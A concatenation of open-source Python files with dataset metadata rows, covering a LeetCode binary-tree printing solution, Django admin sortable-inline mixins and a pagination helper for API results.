packages=find_packages(exclude=['tests']),
include_package_data=True,
zip_safe=False,
install_requires=REQUIRES,
setup_requires=[],
cmdclass=cmdclass,
ext_modules=ext_modules,
test_suite='nose.collector',
)
| mit | 8,931,730,525,621,194,000 | 31.584906 | 78 | 0.645049 | false | 4.092417 | false | false | false |
YiqunPeng/Leetcode-pyq | solutions/655PrintBinaryTree.py | 1 | 1788 | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def printTree(self, root):
"""
:type root: TreeNode
:rtype: List[List[str]]
"""
layers = self.bfs(root)
height = len(layers)
ans = [['']*(2**height-1) for i in xrange(height)]
postions = [i for i in xrange(0, 2**height-1, 2)]
for i in xrange(height-1, -1, -1):
for j in xrange(0, len(postions)):
if layers[i][j]:
ans[i][postions[j]] = str(layers[i][j].val)
new_pos = [(postions[i]+postions[i+1])/2 for i in xrange(0, len(postions)-1, 2)]
postions = new_pos
return ans
def bfs(self, root):
layers = [[root]]
next_layer = layers[-1]
while next_layer:
nodes = []
for node in next_layer:
if not node:
nodes.append(None)
nodes.append(None)
continue
if node.left:
nodes.append(node.left)
else:
nodes.append(None)
if node.right:
nodes.append(node.right)
else:
nodes.append(None)
flag = 0
for node in nodes:
if node:
flag = 1
break
if flag:
layers.append(nodes)
next_layer = layers[-1]
else:
next_layer = []
return layers
| gpl-3.0 | -7,238,612,738,662,014,000 | 28.816667 | 92 | 0.409955 | false | 4.267303 | false | false | false |
benzkji/django-admin-sort | admin_sort/admin/inlines.py | 1 | 5445 | from __future__ import unicode_literals
from django import forms
from django.conf import settings
from django.contrib import admin
from django.core.exceptions import ImproperlyConfigured
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
class SortableInlineMixinBase(object):
# formset = CustomInlineFormSet
_field = None
def __init__(self, *args, **kwargs):
self._field = getattr(self, 'position_field', None)
if not self._field:
msg = _('You have to define a position field on {}').format(
self.__class__.__name__
)
raise ImproperlyConfigured(msg)
if isinstance(self, admin.StackedInline):
self.is_stacked = True
self.is_tabular = False
elif isinstance(self, admin.TabularInline):
self.is_stacked = False
self.is_tabular = True
else:
msg = (
'Class {0}.{1} must also derive from'
' admin.TabularInline or admin.StackedInline'
).format(self.__module__, self.__class__)
raise ImproperlyConfigured(msg)
super(SortableInlineMixinBase, self).__init__(*args, **kwargs)
@property
def template(self):
return 'admin/admin_sort/edit_inline/inline.html'
@property
def html_data_fields(self):
data_fields = getattr(
super(SortableInlineMixinBase, self),
'html_data_fields',
''
)
my_data_fields = {
'admin-sort-position-field': 'field-%s' % self._field
}
data_fields_out = ''
for key, value in my_data_fields.items():
data_fields_out += ' data-{}="{}"'.format(key, value)
return mark_safe('{} {}'.format(data_fields, data_fields_out))
@property
def css_classes(self):
css_classes = getattr(
super(SortableInlineMixinBase, self),
'css_classes',
''
)
my_css_classes = 'admin-sort-inline'
if self.is_tabular:
my_css_classes += ' admin-sort-tabular'
else:
my_css_classes += ' admin-sort-stacked'
if self.extra > 0:
my_css_classes += ' has-extra admin-sort-has-extra'
return '{} {}'.format(css_classes, my_css_classes)
class DragAndDropSortableInlineMixin(SortableInlineMixinBase):
@property
def media(self):
css = {
'all': ['admin_sort/css/sortable.inline.css'],
}
if 'djangocms_admin_style' in settings.INSTALLED_APPS:
css['all'].append('admin_sort/css/sortable.inline.cms.css')
js = (
'admin/js/jquery.init.js',
'admin_sort/js/sortable.js',
'admin_sort/js/sortable.draganddrop.inline.js',
)
original_media = super(DragAndDropSortableInlineMixin, self).media
# return original_media
return original_media + forms.widgets.Media(css=css, js=js)
@property
def css_classes(self):
css_classes = getattr(
super(DragAndDropSortableInlineMixin, self),
'css_classes',
''
)
my_css_classes = 'admin-sort-draganddrop-inline'
return '{} {}'.format(css_classes, my_css_classes)
def get_formset(self, request, obj=None, **kwargs):
formset = super(DragAndDropSortableInlineMixin, self).get_formset(
request,
obj,
**kwargs
)
# needed for extra > 0
formset.form.base_fields[self._field].required = False
# hide it
formset.form.base_fields[self._field].widget = forms.HiddenInput(
attrs={'class': 'admin-sort-position'}
)
return formset
class SortableInlineAdminMixin(DragAndDropSortableInlineMixin):
# deprecated!
pass
class DropdownSortableInlineMixin(SortableInlineMixinBase):
@property
def media(self):
js = [
'admin/js/jquery.init.js',
'admin_sort/js/sortable.dropdown.inline.js',
]
original_media = super(DropdownSortableInlineMixin, self).media
# return original_media
return original_media + forms.widgets.Media(js=js)
@property
def css_classes(self):
css_classes = getattr(
super(DropdownSortableInlineMixin, self),
'css_classes',
''
)
my_css_classes = 'admin-sort-dropdown-inline'
return '{} {}'.format(css_classes, my_css_classes)
def get_formset(self, request, obj=None, **kwargs):
formset = super(DropdownSortableInlineMixin, self).get_formset(
request,
obj,
**kwargs
)
# needed for extra > 0
formset.form.base_fields[self._field].required = False
# prepare widget ARF!
# import pprint
# pprint.pprint(self.__dict__)
# pprint.pprint(self.opts.__dict__)
# pprint.pprint(formset.__dict__)
# pprint.pprint(formset.form)
# TODO: getting count of existing inlines, this is done in js otherwise!
# count = self.model.objects....count()
# choices = [(no, no, ) for no in range(1, count)]
formset.form.base_fields[self._field].widget = forms.Select(
attrs={'class': 'admin-sort-position'},
# choices=choices
)
return formset
| mit | 7,148,667,015,688,821,000 | 32.20122 | 80 | 0.5809 | false | 4.036323 | false | false | false |
yola/demands | demands/pagination.py | 1 | 5015 | from itertools import count
PAGE_PARAM = 'page_param'
PAGE_SIZE_PARAM = 'page_size_param'
PAGE_SIZE = 'page_size'
PAGINATION_TYPE = 'pagination_type'
RESULTS_KEY = 'results_key'
NEXT_KEY = 'next_key'
START = 'start'
class PaginationType(object):
ITEM = 'item'
PAGE = 'page'
class PaginatedResults(object):
"""Paginated API results
Returns an iteratable container of items from paginated function, useful
for service methods that return paginated results.
The paginated function should accept a page and page size argument and
return a page of results for those arguments nested in a 'results' key:
>>> def numbers(page, page_size):
... start = (page - 1) * page_size
... end = start + page_size
... return {'results': range(0, 100)[start:end]}
...
>>> results = PaginatedResults(numbers)
>>> list(results)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, ... 99]
The names of these arguments, the value for `page_size`, the starting page
number (which defaults to page 1), and the results key can be overriden
through the init of the class:
>>> def numbers(offset, length):
... start = offset * length # expects start of 0
... end = start + length
... return {'numbers': range(0, 100)[start:end]}
...
>>> results = PaginatedResults(
... numbers, page_param='offset', page_size_param='length',
... page_size=10, results_key='numbers', start=0)
>>> [n for n in results]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, ... 99]
If your function returns the results as a top-level list, set the
`results_key` to `None`.
>>> def numbers(page, page_size):
... start = (page - 1) * page_size
... end = start + page_size
... return range(0, 100)[start:end]
...
>>> results = PaginatedResults(numbers, results_key=None)
>>> list(results)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, ... 99]
The `pagination_type` configuration defines how the api behaves, by
default this is set to `PaginationType.PAGE` which means the API should
expect the `page_param` to represent the index of the page to return.
Set this value to `PaginationType.ITEM` if the API expects `page_param` to
represent the index of an item.
>>> def numbers(offset, limit):
... start = offset
... end = start + limit
... return {'results': range(0, 100)[start:end]}
...
>>> results = PaginatedResults(
... numbers, page_param='offset', page_size_param='limit',
... pagination_type=PaginationType.ITEM)
>>> list(results)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, ... 99]
"""
DEFAULT_OPTIONS = {
PAGE_PARAM: 'page',
PAGE_SIZE_PARAM: 'page_size',
PAGE_SIZE: 100,
PAGINATION_TYPE: PaginationType.PAGE,
RESULTS_KEY: 'results',
NEXT_KEY: 'next',
}
def __init__(self, paginated_fn, args=(), kwargs=None, **options):
self.paginated_fn = paginated_fn
self.args = args
self.kwargs = kwargs or {}
self.options = dict(self.DEFAULT_OPTIONS)
self.options.update(options)
def __iter__(self):
for page_id in self._page_ids():
page = self._get_page(page_id)
for item in page.items:
yield item
if page.is_last_page:
return
def _get_page(self, page):
kwargs = dict(self.kwargs)
kwargs.update({
self.options[PAGE_PARAM]: page,
self.options[PAGE_SIZE_PARAM]: self.options[PAGE_SIZE],
})
one_page_data = self.paginated_fn(*self.args, **kwargs)
return Page(one_page_data, self.options)
def _page_ids(self):
if self.options[PAGINATION_TYPE] == PaginationType.PAGE:
start = self.options.get(START, 1)
return count(start)
if self.options[PAGINATION_TYPE] == PaginationType.ITEM:
start = self.options.get(START, 0)
return count(start, self.options[PAGE_SIZE])
raise ValueError('Unknown pagination_type')
class Page(object):
def __init__(self, data, options):
self._data = data
self._options = options
@property
def items(self):
results_key = self._options.get(RESULTS_KEY)
if results_key:
return self._data[results_key]
return self._data
@property
def size(self):
return len(self.items)
@property
def is_last_page(self):
next_key = self._options.get(NEXT_KEY)
next_page_is_null = (
next_key in self._data and
self._data[next_key] is None
)
return self.size < self._options[PAGE_SIZE] or next_page_is_null
| mit | -8,171,778,497,806,336,000 | 32.885135 | 78 | 0.569292 | false | 3.618326 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.